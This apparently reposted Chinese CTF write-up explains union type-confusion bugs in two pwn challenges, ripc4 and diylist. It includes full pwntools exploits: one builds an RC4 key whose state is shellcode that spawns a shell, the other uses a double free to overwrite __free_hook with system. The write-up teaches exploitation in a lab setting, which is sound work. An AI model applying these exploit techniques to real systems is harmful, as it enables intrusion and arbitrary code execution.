一个union引发的惨案

一个union引发的惨案
2020-03-24 10:48:24 Author: xz.aliyun.com(查看原文) 阅读量:336 收藏

前言

最近看一些国际赛的题目，遇到了一种之前没有见到过的漏洞，是关于union这个联合类型的错用，漏洞原理很简单，不过比较新奇，这里分享给大家。

题目文件在这里

原题在BUUCTF平台上有复现，感兴趣的同学可以去做下。

预备知识

其实也算不上预备知识，算是小常识，就是union类型的变量的内存区域是共享的，这也是为什么我们用联合这个类型而不是用结构体，它可以应用在多个变量中只用其一的场景中，这里以一个简单的demo举例，定义union var，包含两个成员变量var1,var2，分别设置值并输出，可以看到二者共享一块内存区域，一旦我们修改其一变量，另一个变量的值也会变化，这为我们节省内存带来了便利，然而也造成了一些错用的风险。

// gcc ./poc.c -o poc && ./poc
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

union var {
    char var1;
    unsigned int var2;
};

int main()
{
    union var test;
    test.var1 = 'x';
    printf("[*]var1 %c @ %p\n",test.var1,&test.var1);
    test.var2 = 0x41414141;
    printf("[*]var2 0x%x @ %p\n",test.var2,&test.var2);
    //what about var1 now ?
    printf("[*]var1 %c @0x%p\n",test.var1,&test.var1);
    return 0;
}
/*
╭─wz@wz-virtual-machine ~/Desktop/CTF/BesidesCTF2020/ripc4 ‹hexo*› 
╰─$ gcc ./poc.c -o poc && ./poc
[*]var1 x @ 0x7fffffffe350
[*]var2 0x41414141 @ 0x7fffffffe350
[*]var1 A @0x0x7fffffffe350
*/

Bsides CTF 2020 ripc4

程序分析

题目给了.c文件，不需要从IDA去看。首先看题目实现的功能，首先关注题目中核心的结构体，这样一个结构体用来表示不同类型的结构

开始需要我们设置ws的类型，这里的ws是通过workspace_t *ws = secure_malloc(sizeof(workspace_t));分配的，我们稍后关注这个函数。

在类型设置完毕之后，我们可以对于不同类型的结构使用不同的功能。核心的逻辑如下，首先对于三种类型的结构，均可以使用set_input函数，用以向input_buf输入数据。而在使用set_encoding功能的时候，会检查是否为TYPE_ENCRYPT类型，是的话则不能使用。过检查后调用set_encoding函数。

while (1) {
    print_menu(ws->type);
    char *cmd = prompt("command");
    if (!cmd) {
      printf("Exiting!\n");
      return 0;
    }
    if (CMD_IS("quit") || CMD_IS("exit")) {
      return 0;
    } else if (CMD_IS("set_input")) {
      set_input(ws);
      continue;
    } else if (CMD_IS("set_encoding")) {
      if (CHECK_TYPE(ws, TYPE_ENCRYPT)) {
        printf("No encoding for encrypted type!\n");
        continue;
      }
      set_encoding(ws);
      continue;
    } else if (CMD_IS("print")) {
      print_state(ws);
      continue;
    } else if (CMD_IS("set_key")) {
      if (!CHECK_TYPE(ws, TYPE_ENCRYPT)) {
        printf("Can only set key for encrypted type.\n");
        continue;
      }
      set_key(ws);
      continue;
    } else if (CMD_IS("encrypt")) {
      if (!CHECK_TYPE(ws, TYPE_ENCRYPT)) {
        printf("Can only encrypt for encrypted type.\n");
        continue;
      }
      do_encrypt(ws);
      continue;
    }
  }

所有类型的结构都可以调用print函数。在源码中print_state函数似乎做了类型检查，我们跟进去看一下这个宏，会发现只要target->type & t == t即可。而TYPE_ENCRYPT为3，3 & 2 == 2，是可以绕过这个检查从而调用ws->print_encoded(ws->input_buf, ws->buf_len);的。而这个函数指针是作为union类型变量的一部分，其和enc_state是共享内存空间的，我们可以通过set_key和do_encrypt来设置这个变量，从而使得程序执行任意指令。

#define CHECK_TYPE(ws, t) ((ws->type & t) == t)

#define TYPE_PLAIN 1
#define TYPE_ENCODE 2
#define TYPE_ENCRYPT 3

void print_state(workspace_t *ws) {
  if (CHECK_TYPE(ws, TYPE_ENCODE)) {
    if (!ws->print_encoded) {
      printf("Must use set_encoding first.\n");
      return;
    }
    ws->print_encoded(ws->input_buf, ws->buf_len);
  } else if (CHECK_TYPE(ws, TYPE_PLAIN)) {
    printf("%s\n", ws->input_buf);
  } else {
    printf("Printing not supported for encrypted data.\n");
  }
}

只有TYPE_ENCRYPT可以调用set_key函数和do_encrypt函数。

以上是主要功能的分析，下面关注函数细节。

secure_malloc会分配一块可以执行的区域并返回。

#define PROT_MASK (PROT_READ|PROT_WRITE|PROT_EXEC)
#define PROT_RW (PROT_MASK|PROT_READ|PROT_WRITE)

void *secure_malloc(size_t sz) {
  size_t pg_size = (size_t)sysconf(_SC_PAGESIZE);
  // Round size up
  sz = (sz + pg_size-1) & ~(pg_size-1);
  // Add guard pages
  sz += (pg_size << 1);
  void *ptr = mmap(NULL, sz, PROT_RW, MAP_PRIVATE|MAP_ANONYMOUS|MAP_LOCKED, -1, 0);
  if (ptr == MAP_FAILED) {
    printf("Unable to allocate memory!\n\n");
    printf("Error: %s\n", strerror(errno));
    _exit(1);
  }
  *(size_t *)ptr = sz;
  // Lower guard page
  mprotect(ptr, pg_size, PROT_NONE);
  // Upper guard page
  mprotect((char *)ptr+sz-pg_size, pg_size, PROT_NONE);
  return (char *)ptr+pg_size;
}

encode功能实现的是base64的编码以及十六进制的编码。

题目的encrypted部分实现了rc4加密算法，先让用户输入key之后调用set_key设置密钥，最后调用do_encryptrc4流密码加密。rc4算法可以网上去找不再赘述。

void set_key(workspace_t *ws) {
  char *key_data = prompt("key (hex)");
  if (!key_data) {
    printf("No key!\n");
    return;
  }
  size_t key_len = strlen(key_data);
  if (key_len > (KEY_LEN_MAX * 2) ||
      key_len < (KEY_LEN_MIN * 2) ||
      key_len % 2) {
    printf("Invalid key length!\n");
    return;
  }
  for (int i=0;i<key_len;i+=2) {
    int byte;
    int rv = sscanf(&key_data[i], "%02x", &byte);
    if (rv != 1) {
      printf("Invalid key data!\n");
      return;
    }
    key_data[i/2] = (char)(byte & 0xFF);
  }
  key_len = key_len >> 1;
  // Allocate key data
  if (ws->enc_state) {
    secure_free(ws->enc_state);
    ws->enc_state = NULL;
  }
  ws->enc_state = secure_malloc(RC4_SZ);
  // Initial data
  for (int i=0;i<RC4_SZ;i++) {
    ws->enc_state[i] = i;
  }
  // Permute from key
  int j=0;
  for (int i=0;i<RC4_SZ;i++) {
    j = (j + ws->enc_state[i] + key_data[i % key_len]) & 0xFF;
    char tmp = ws->enc_state[i];
    ws->enc_state[i] = ws->enc_state[j];
    ws->enc_state[j] = tmp;
  }
  memset(key_data, 0, key_len * 2);
  printf("Key has been set.\n");
}

void do_encrypt(workspace_t *ws) {
  // PRGA keystream
  int i=0, j=0;
  for(int k=0;k<ws->buf_len;k++) {
    i += 1;
    i &= 0xFF;
    j += ws->enc_state[i];
    j &= 0xFF;
    int tmp = ws->enc_state[i];
    ws->enc_state[i] = ws->enc_state[j];
    ws->enc_state[j] = tmp;
    tmp = ws->enc_state[(ws->enc_state[i] + ws->enc_state[j]) & 0xFF];
    ws->input_buf[k] ^= tmp;
  }
  printf("Buffer encrypted!\n");
}

漏洞分析

在程序分析部分我们已经找到了漏洞，即在print_state函数中可以执行任意代码，我们可以将其改为shellcode，之后通过调用print来触发shellcode执行。

具体如下。

我们输入构造好的Key，使得在初始化key数组以及enc_state数组时让enc_state为shellcode。构造的方式也并不难，我们只需要逆一下set_key对于key的变换，固定enc_state，从而得到输入的key。

另外rc4密钥变换的时候是遍历数组，将所有enc_state交换一遍，因为enc_staet被初始化为[0,0xff]，因此混淆之后的数组中不会出现两个相同的byte，如此一来，/bin/sh就不能用了，可以先构造个读取后续shellcode的sc，之后输入后面get shell的sc即可。

调试到代码执行处下断点，看一眼寄存器的情况，发现我们只需要设置rsi/rdx即可。

exp.py

#coding=utf-8
from pwn import *
import random

r = lambda p:p.recv()
rl = lambda p:p.recvline()
ru = lambda p,x:p.recvuntil(x)
rn = lambda p,x:p.recvn(x)
rud = lambda p,x:p.recvuntil(x,drop=True)
s = lambda p,x:p.send(x)
sl = lambda p,x:p.sendline(x)
sla = lambda p,x,y:p.sendlineafter(x,y)
sa = lambda p,x,y:p.sendafter(x,y)

context.update(arch='amd64',os='linux',log_level='DEBUG')
context.terminal = ['tmux','split','-h']
debug = 0
elf = ELF('./ripc4')
libc_offset = 0x3c4b20
gadgets = [0x45216,0x4526a,0xf02a4,0xf1147]
if debug:
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    p = process('./ripc4')

else:
    p = remote('node3.buuoj.cn',28819)

def exp():
    sla(p,"type (plain, encoded, encrypted)> ","encrypted")
    sla(p,"command> ","set_key")
    #get key
    state = range(256)
    target = range(256)

    sc = asm('''
            xor edi,edi
            mov rsi,rcx
            mov dh,0x4
            syscall
            ''')
    sc = list(sc)
    shellcode = [ord(item) for item in sc]
    target = filter(lambda c: not c in shellcode, target)

    target = shellcode + target
    sc = ''.join(chr(item) for item in shellcode)
    print disasm(sc)

    key_lis = range(256)
    j = 0
    for i in range(256):
        tg = target[i]
        target_idx = state.index(tg)
        temp = target_idx
        temp += 0x300
        temp -= j
        temp -= state[i]
        j = target_idx & 0xff
        key_lis[i] = temp & 0xff
        state[i],state[j] = state[j],state[i]
    key = ''.join(hex(item)[2:].zfill(2) for item in key_lis)
    print(key)
    sla(p,"key (hex)> ",key)
    #gdb.attach(p,'b* 0x0000555555554000+0x197c')
    sla(p,"command> ","print")

    #get more sc
    sc = '\x90'*len(sc)+asm(shellcraft.amd64.linux.sh())
    raw_input()
    p.sendline(sc)

    p.interactive()

exp()

zer0ptsCTF 2020 diylist

程序逻辑

漏洞环境为ubuntu 18.04/2.27，没有开PIE，Partial RELRO，有canary/NX保护。

还是典型的菜单题，共有add/get/edit/del四个功能。

程序维护了一个伪链表，名为list，实际上并不是传统意义的链表。成员size表示目前链表中的item数量，max指链表所能容纳的最大item数量。

typedef struct {
  int size;
  int max;
  Data *data;
} List;

List* list_new(void)
{
  List *list;

  list = (List*)malloc(sizeof(List));
  list->size = 0;
  list->max = 0;
  list->data = NULL;

  return list;
}

另一个成员data是联合类型的，其成员有p_char/d_long/d_double。我们add/edit等操作的直接对象就是这样一个data类型的变量。

add函数向list中添加一个成员，这里的链表是用malloc进行分配的，因此它存储在堆上。首先确定用户输入的类型，如果是long/double/str则调用read_long/read_double/read_str读取变量，返回值强制转换为Data类型传给list_add函数。

list_add检查当前的size是否达到了max上限，是的话就为list->data分配一块更大区域存储数据，并将之前数据悉数拷贝至新区域。

如果是long/double类型，则直接插入到后面，如果是str类型则调用strdup将输入拷贝到堆并将堆地址写入到list->data[size]。然后将这个堆地址存储在全局变量fpool里。

typedef union {
  char *p_char;
  long d_long;
  double d_double;
} Data;

void add(List *list)
{
  char buf[128];
  printf("Type(long=%d/double=%d/str=%d): ", LIST_LONG, LIST_DOUBLE, LIST_STRING);

  switch(read_long()) {
  case LIST_LONG:
    printf("Data: ");
    list_add(list, (Data)read_long(), LIST_LONG);
    break;

  case LIST_DOUBLE:
    printf("Data: ");
    list_add(list, (Data)read_double(), LIST_DOUBLE);
    break;

  case LIST_STRING:
    printf("Data: ");
    read_str(buf);
    list_add(list, (Data)buf, LIST_STRING);
    break;

  default:
    puts("Invalid option");
    return;
  }
}

/*
 * Add an element
 */
void list_add(List* list, Data data, LIST_TYPE type)
{
  Data *p;

  if (list->size >= list->max) {
    /* Re-allocate a chunk if the list is full */
    Data *old = list->data;
    list->max += CHUNK_SIZE;

    list->data = (Data*)malloc(sizeof(Data) * list->max);
    if (list->data == NULL)
      __list_abort("Allocation error");

    if (old != NULL) {
      /* Copy and free the old chunk */
      memcpy((char*)list->data, (char*)old, sizeof(Data) * (list->max - 1));
      free(old);
    }
  }

  /* Store new data */
  switch(type) {
  case LIST_LONG:
    list->data[list->size].d_long = data.d_long;
    break;
  case LIST_DOUBLE:
    list->data[list->size].d_double = data.d_double;
    break;
  case LIST_STRING:
    list->data[list->size].p_char = strdup(data.p_char);
    /* Insert the address to free pool
       so that it'll be freed when the list is deleted */
    if (fpool_num < MAX_FREEPOOL) {
      fpool[fpool_num] = list->data[list->size].p_char;
      fpool_num++;
    }
    break;
  default:
    __list_abort("Invalid type");
  }

  list->size++;
}

get函数输出指定idx的内容，这里注意如何输出取决于我们选择的类型，因为union成员的内存共享，因此对于同样一个data，我们选择long类型，就可以用%ld输出，如果我们选择str类型，就可以用%s输出，是一个类型混淆错误。

void get(List *list)
{
  printf("Index: ");
  long index = read_long();

  printf("Type(long=%d/double=%d/str=%d): ", LIST_LONG, LIST_DOUBLE, LIST_STRING);

  switch(read_long()) {
  case LIST_LONG:
    printf("Data: %ld\n", list_get(list, index).d_long);
    break;

  case LIST_DOUBLE:
    printf("Data: %lf\n", list_get(list, index).d_double);
    break;

  case LIST_STRING:
    printf("Data: %s\n", list_get(list, index).p_char);
    break;

  default:
    puts("Invalid option");
    return;
  }
}

/*
 * Get an element
 */
Data list_get(List* list, int index)
{
  if (index < 0 || list->size <= index)
    __list_abort("Out of bounds error");

  return (Data)list->data[index].p_char;
}

edit可以编辑list->data[index]。这里可以结合之前类型混淆的漏洞利用，比如我们想知道addr处的值，则可以先使用edit的long类型编辑data为addr，而后用get的str部分处理，从而泄露内存内容。

void edit(List *list)
{
  char buf[128];

  printf("Index: ");
  long index = read_long();
  printf("Type(long=%d/double=%d/str=%d): ", LIST_LONG, LIST_DOUBLE, LIST_STRING);

  switch(read_long()) {
  case LIST_LONG: /* long */
    printf("Data: ");
    list_edit(list, index, (Data)read_long(), LIST_LONG);
    break;

  case LIST_DOUBLE: /* double */
    printf("Data: ");
    list_edit(list, index, (Data)read_double(), LIST_DOUBLE);
    break;

  case LIST_STRING: /* str */
    printf("Data: ");
    read_str(buf);
    list_edit(list, index, (Data)buf, LIST_STRING);
    break;

  default:
    puts("Invalid option");
    return;
  }
}
/*
 * Edit an element
 */
void list_edit(List* list, int index, Data data, LIST_TYPE type)
{
  if (index < 0 || list->size <= index)
    __list_abort("Out of bounds error");

  /* Store the data */
  switch(type) {
  case LIST_LONG:
    list->data[index].d_long = data.d_long;
    break;
  case LIST_DOUBLE:
    list->data[index].d_double = data.d_double;
    break;
  case LIST_STRING:
    list->data[index].p_char = strdup(data.p_char);
    /* Insert the address to free pool */
    if (fpool_num < MAX_FREEPOOL) {
      fpool[fpool_num] = list->data[list->size].p_char;
      fpool_num++;
    }
    break;
  default:
    __list_abort("Invalid type");
  }
}

del删除指定索引的data及fpool存储的堆块，删除方式是从要删除的data后面依次向前覆盖data数据。

之后根据fpool[i] == data.p_char去寻找fpool对应的堆块，注意这里p_char也可以是long类型得到的一个地址，因此结合上edit我们可以控制任意地址的释放，并且free之后并未清空fpool数据。

void del(List *list)
{
  printf("Index: ");
  long index = read_long();

  list_del(list, index);
  puts("Successfully removed");
}
/*
 * Delete an element
 */
void list_del(List* list, int index)
{
  int i;
  if (index < 0 || list->size <= index)
    __list_abort("Out of bounds error");

  Data data = list->data[index];

  /* Shift data list and remove the last one */
  for(i = index; i < list->size - 1; i++) {
    list->data[i] = list->data[i + 1];
  }
  list->data[i].d_long = 0;

  list->size--;

  /* Free data if it's in the pool list */
  for(i = 0; i < fpool_num; i++) {
    if (fpool[i] == data.p_char) {
      free(data.p_char);
      break;
    }
  }
}

漏洞利用

前面提到的free未清空heap地址，结合之前的类型混淆，可以触发double free。因为没有开PIE，我们写入puts@got之后get泄露libc;写入fpool_addr再get可以泄露堆地址。之后我们通过编辑long类型，向list插入chunk0的地址，以使得list中有两个相同的堆地址。而fpool也存储了这个堆地址，我们连续删除这两个idx的data，就能造成double free。

这样我们在ubuntu 18下可以拿tcache attack覆写__free_hook为system并释放一个内容为/bin/sh\x00的堆来get shell。

exp.py

这也是给了源代码的题目，题目用了一个未发行的libc，如果想本地调试的话，可以拿下面命令编译一个。

gcc -c diylist.c
gcc main.c -o main diylist.o

#coding=utf-8
from pwn import *

r = lambda p:p.recv()
rl = lambda p:p.recvline()
ru = lambda p,x:p.recvuntil(x)
rn = lambda p,x:p.recvn(x)
rud = lambda p,x:p.recvuntil(x,drop=True)
s = lambda p,x:p.send(x)
sl = lambda p,x:p.sendline(x)
sla = lambda p,x,y:p.sendlineafter(x,y)
sa = lambda p,x,y:p.sendafter(x,y)

context.update(arch='amd64',os='linux',log_level='DEBUG')
context.terminal = ['tmux','split','-h']
debug = 1
elf = ELF('./main')
libc_offset = 0x3c4b20
gadgets = [0x45216,0x4526a,0xf02a4,0xf1147]
if debug:
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
    p = process('./main')

else:
    libc = ELF('./x64_libc.so.6')
    p = remote('f.buuoj.cn',20173)

maps = {"long":"1","double":"2","str":"3"}

def Add(tp,data):
    p.recvuntil('> ')
    p.sendline('1')
    p.recvuntil("Type(long=1/double=2/str=3): ")
    p.sendline(maps[tp])
    p.recvuntil("Data: ")
    p.send(data)

def Show(index,tp):
    p.recvuntil('> ')
    p.sendline('2')
    p.recvuntil("Index: ")
    p.sendline(str(index))
    p.recvuntil("Type(long=1/double=2/str=3): ")
    p.sendline(maps[tp])

def Edit(index,tp,data):
    p.recvuntil('> ')
    p.sendline('3')
    p.recvuntil("Index: ")
    p.sendline(str(index))
    p.recvuntil("Type(long=1/double=2/str=3): ")
    p.sendline(maps[tp])
    p.recvuntil("Data: ")
    p.send(data)


def Delete(index):
    p.recvuntil('> ')
    p.sendline('4')
    p.recvuntil("Index: ")
    p.sendline(str(index))


def exp():
    #leak libc
    Add("str","/bin/sh")#0
    Add("str","/bin/sh")#1
    puts_got = elf.got["puts"]

    Edit(0,"long",str(puts_got))

    Show(0,"str")
    p.recvuntil("Data: ")
    libc_base = u64(p.recvline().strip('\n').ljust(8,'\x00')) - libc.sym['puts']
    log.success("libc base => " + hex(libc_base))
    #leak heap
    bss_lis = 0x602100
    Edit(0,"long",str(bss_lis))
    Show(0,"str")
    p.recvuntil("Data: ")
    heap_base = u64(p.recvline().strip('\n').ljust(8,'\x00')) - 0x2b0
    log.success("heap base => " + hex(heap_base))

    #recover
    Edit(0,"long",str(heap_base+0x2b0))
    Edit(1,"long",str(heap_base+0x2b0))

    Delete(1)
    Delete(0)
    #gdb.attach(p,'b malloc')
    Add("str",p64(libc_base+libc.sym['__free_hook']))
    Add("str","/bin/sh\x00")
    Add("str",p64(libc_base+libc.sym['system']))
    Delete(0)
    p.interactive()

exp()

总结

这两道题利用的漏洞原理都是union的变量内存共享，因为变量名的缘故做题的时候可能会自动代入到对应的类型而忽略了这个变量在作为其他类型处理时候可能会被赋值或读取，不过因为union用的比较少，一旦我们接触到这类漏洞之后，一旦题目中出现就容易引起警觉。此外在IDA的反汇编中其实并不会识别出union，对它来讲这只是一个变量而已，因此直接看IDA或许会更容易发现漏洞。

文章来源: http://xz.aliyun.com/t/7410
如有侵权请联系:admin#unsafe.sh